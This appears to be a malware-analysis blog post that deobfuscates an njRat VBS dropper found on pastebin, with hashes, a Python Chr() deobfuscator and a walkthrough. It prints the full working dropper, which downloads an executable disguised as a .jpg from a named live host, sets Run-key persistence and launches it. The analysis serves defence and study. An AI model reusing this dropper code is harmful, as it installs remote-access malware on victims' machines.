Yesterday (21.11.2018) the dropper code of njRat, a.k.a. Worm.VBS.Dinihou.au, was posted to
pastebin.com. It was still available today at https://pastebin.com/W1yyfPiy. The
dropper downloads and persists an executable that is detected as Generic.MSIL.Bladabindi.1E8DC4B3.
The VBS code downloads an executable with SHA256 hash c26f8c36052c150625a0e2e2676af5fa7e7d222bb2343720a66d48c7a9855256,
which can be found on VirusTotal: https://www.virustotal.com/#/file/c26f8c36052c150625a0e2e2676af5fa7e7d222bb2343720a66d48c7a9855256/detection
The VBS code itself can be found at https://www.virustotal.com/#/file/6a4523e7eb200e1a3b22805d525b1eb0409388df118f524d7c4e64fc7a514274/detection
The script consists of very long obfuscated lines. First
I cut the long lines into shorter ones and prefixed them. So I got the following code:
str = Chr(27 + 84) & Chr(16 + 94) & Chr(-12 + 44) & Chr(18 + 83) & Chr(60 + 54) & Chr(51 + 63) & Chr(205 - 94)
str = str & Chr(43 + 71) & Chr(60 - 28) & Chr(41 + 73) & Chr(60 + 41) & Chr(7475 / 65) & Chr(135 - 18) & Chr(118 - 9)
.
.
.
str = str & Chr(64 + 18) & Chr(19 + 93) & Chr(147 - 33) & Chr(37 * 3) & Chr(140 - 41) & Chr(171 - 70) & Chr(62 + 53)
str = str & Chr(80 + 35) & Chr(40 - 27) & Chr(780 / 78)
? str
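The obfuscation layer is nothing more than Chr() calls on small arithmetic expressions joined with &, so the string can be recovered statically without ever running the script. The following Python deobfuscator is an added example (not part of the original post): it walks the Python AST of each Chr() argument instead of calling eval(), so only integer arithmetic is ever evaluated. SAMPLE holds the first and last fragments quoted above, so the result is the start and the end of the decoded payload.

```python
import ast
import operator
import re

# Constructed sample: the first and last obfuscated lines quoted on this page
# (the elided middle part of the script is not included).
SAMPLE = """str = Chr(27 + 84) & Chr(16 + 94) & Chr(-12 + 44) & Chr(18 + 83) & Chr(60 + 54) & Chr(51 + 63) & Chr(205 - 94)
str = str & Chr(43 + 71) & Chr(60 - 28) & Chr(41 + 73) & Chr(60 + 41) & Chr(7475 / 65) & Chr(135 - 18) & Chr(118 - 9)
str = str & Chr(64 + 18) & Chr(19 + 93) & Chr(147 - 33) & Chr(37 * 3) & Chr(140 - 41) & Chr(171 - 70) & Chr(62 + 53)
str = str & Chr(80 + 35) & Chr(40 - 27) & Chr(780 / 78)
"""

# The only operators the obfuscator uses; anything else is rejected.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def eval_arith(expr: str) -> int:
    """Evaluate a Chr() argument made only of numbers and + - * /.

    The expression is parsed with ast and walked node by node, so no
    function call, name lookup or attribute access can ever execute."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported construct in Chr() argument: {expr!r}")

    # VBScript's / is floating-point division and Chr() rounds its argument,
    # so 7475 / 65 -> 115.0 -> 115 ('s').
    return int(round(walk(ast.parse(expr.strip(), mode="eval").body)))


# One Chr(...) call; VBScript identifiers are case-insensitive.
CHR_RE = re.compile(r"Chr\(([^()]*)\)", re.IGNORECASE)


def deobfuscate(vbs: str) -> str:
    """Concatenate every Chr() literal in source order, which is exactly
    what the 'str = str & Chr(...) & ...' lines build up at run time."""
    return "".join(chr(eval_arith(m.group(1))) for m in CHR_RE.finditer(vbs))


if __name__ == "__main__":
    print(repr(deobfuscate(SAMPLE)))
```

Run on the full pastebin script, the output is the deobfuscated VBS shown below this section.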
The deobfuscated code is VB script code too (the identifiers are French: CreerRep = create directory, Chemin = path, CleRegistre = registry key):
on error resume next
WScript.Sleep 60
Dim ofso
Set ofso = CreateObject("Scripting.FileSystemObject")
CreerRep("C:\ProgramData\Adobe\system32\")
' Recursively create the drop folder and any missing parents
Sub CreerRep(Chemin)
    If Not ofso.FolderExists(chemin) Then
        CreerRep(ofso.GetParentFolderName(chemin))
        ofso.CreateFolder(chemin)
    End If
End Sub
dim SSSSS
dim process
dim PPPPP
set SSSSS = CreateObject("Microsoft.XMLHTTP")
set process = CreateObject("WScript.shell")
Set PPPPP = createobject("Adodb.Stream")
URL = "https://c.top4top.net/p_1055q1ssb1.jpg"
Rprocess = "C:\ProgramData\Adobe\system32\process.exe"
' Download the payload (hosted under a .jpg name) and write it to disk as a binary stream
SSSSS.open "GET", URL, False
SSSSS.send
with PPPPP
    .type = 1 '//binary
    .open
    .write SSSSS.responseBody
    .savetofile "C:\ProgramData\Adobe\system32\process.exe", 2
end with
' Persistence: three values under the current user's Run key
Set ObjetRegedit = CreateObject("WScript.Shell")
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CPU64"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\CPU64.exe", "REG_SZ"
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\process"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\process.exe", "REG_SZ"
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dekstop"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\dekstop.ini.vbs", "REG_SZ"
Set ObjetRegedit = Nothing
WScript.Sleep 6000
' Launch the downloaded payload
process.run Rprocess
First the code creates the folder C:\ProgramData\Adobe\system32\
for the final executable. Next an
XMLHTTP object is created, which downloads a "jpeg image" from https://c.top4top.net/p_1055q1ssb1.jpg,
still available at the time of writing. The file is of course not an image but the
njRat executable. It is saved as C:\ProgramData\Adobe\system32\process.exe.
To persist the executable, the script uses the Windows
Registry. It writes three new values under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,
namely CPU64, process and dekstop (yes, it has a typo). Their data are
C:\ProgramData\Adobe\system32\CPU64.exe, C:\ProgramData\Adobe\system32\process.exe
and C:\ProgramData\Adobe\system32\dekstop.ini.vbs respectively. Since the script never writes CPU64.exe
or dekstop.ini.vbs to disk, it seems that the first and third
entries are redundant and only HKCU\Software\Microsoft\Windows\CurrentVersion\Run\process
actually persists this malware.
Finally the script uses a WScript.Shell object to launch the
downloaded payload.